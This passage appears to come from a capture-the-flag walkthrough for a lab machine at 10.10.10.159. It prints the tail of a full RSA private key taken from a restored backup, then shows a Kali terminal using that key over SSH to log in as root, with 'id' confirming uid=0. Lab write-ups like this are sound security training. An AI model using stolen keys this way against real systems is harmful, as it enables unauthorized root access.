4/Mf9DGdeUrejRlX0BI2EGiZhPKwwKxqIHLRpw4pR4+OjR1sOkAA7UWtMYn/3cs+
IS3L75/i5Qsr0cMCtZ/hQAKtjpPoCCe1qHp7CQIDAQABAoIBAFlvYtQaoLGKK2NG
sJgOGDicV8o37bvtLCvVBzJ+Ck0rgnGw4/s1Hb2BpOj8c2dY/T5k55zxEMGYuVUC
BAxBTtCp8yuCTPOekQluqN9w6myZCK9Ol0NSJeI3N1zn6NvUkG0293T55EBuBp0D
k82BhTg1YeQzi00xAmp8bb5MjUFCiCbSFH1MMpY/9itg1b3mqx7UlyDldMM9UdKH
HS9aZmAzY5/U6wEtJi4mx3QIoVahytMgcxd7qoicCYyVm73HFQsZ58L+5QflygH4
dpbptPOnNmLUkWFXcK3bmlmrEyuafS6z68oDFeAZz8Dg2D2qXWfhdlN4GVstlxSI
skH5sAECgYEAySOp7KOZJVpstF8zjn+/OZowEF4iSHnaGAX64B6GgWwXQURn3wVq
tlqDO5m5vIexe2tyFDSVe5otWtzQvbPNkjpD7/kglGTbT9PCU/Dgb5pTmOxBPi9a
1W8+q7lwiXLIRb4NB+BqDz0yI924BnZt9rukzm9650Rrbala0HZxhIECgYEAxCux
RQUzgSx7YdzThvB8sAzQJj2gNAbwEA9Y56I0pQLvTNoGQY8V8IYBrlvW935kLfcf
xz8j5VNt1BizDQjG8j5FfVcU6VE98/OMgn4XKd6nl9sOoQBXzssjUF+3AIhn5DsK
Q/IymTZEmhfGAt9k6dE4WH8qffea/E7qJY+pkokCgYAdatLiYjb2yJfXdYkD0Vk1
YoCfFDVtZizokI9VkgFYEmgASrHqY09tJiXFZMFOeoYRp/BCVkJ6ll0Fyf/Zjt+F
AHKJOWVzbqDItw7X2gXpLKgHWJ5eKuzdBG0lDnUQFTKHSLl9Kmw4mFmp9zZ/83g3
us/qxVEzW8Vef4Nhs8D8gQKBgDtsMMqDhNKAMu+2AK1Dc8GwX+z1he28nEOBIqEn
1WKWvP4+nN6HBVJShXfXggp+UsJJtWqZiboRx5cT1EkCe6Etk8cf9cmnPmkDQXDV
2RZpx8KMLKZAgFi31/6kv759k1rjN3zVhNY8RhOXV/fOy7a4FaVY//ogYuZC0VKH
bgphAoGBAKGyJQe/b6rUkpzvIBxbGt9Hw1kpLr07VCdPQb1MCdCU4l+mlDD5NBN3
mzygp6MTi+TvN3PhxlfAmUPbz0qw+3aX95pt2cQ492wLOe+RsVsKtvDTgH/2+DUe
2qnb+Jd6ERs3jmBeuuavC2O5ajhyLt1xL3uF5UVpoenCYlYuOvL4
-----END RSA PRIVATE KEY-----
root@kali:/tmp/restore/root# ssh -i .ssh/id_rsa [email protected]
Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-65-generic x86_64)
System information as of Fri Feb 7 17:14:55 UTC 2020
System load: 0.0 Users logged in: 2
Usage of /: 5.7% of 61.80GB IP address for eth0: 10.10.10.159
Memory usage: 43% IP address for docker0: 172.17.0.1
Swap usage: 0% IP address for br-1bad9bd75d17: 172.18.0.1
Processes: 172
Last login: Fri Feb 7 16:58:08 2020 from 10.10.15.7
root@bolt:~# id
uid=0(root) gid=0(root) groups=0(root)
root@bolt:~#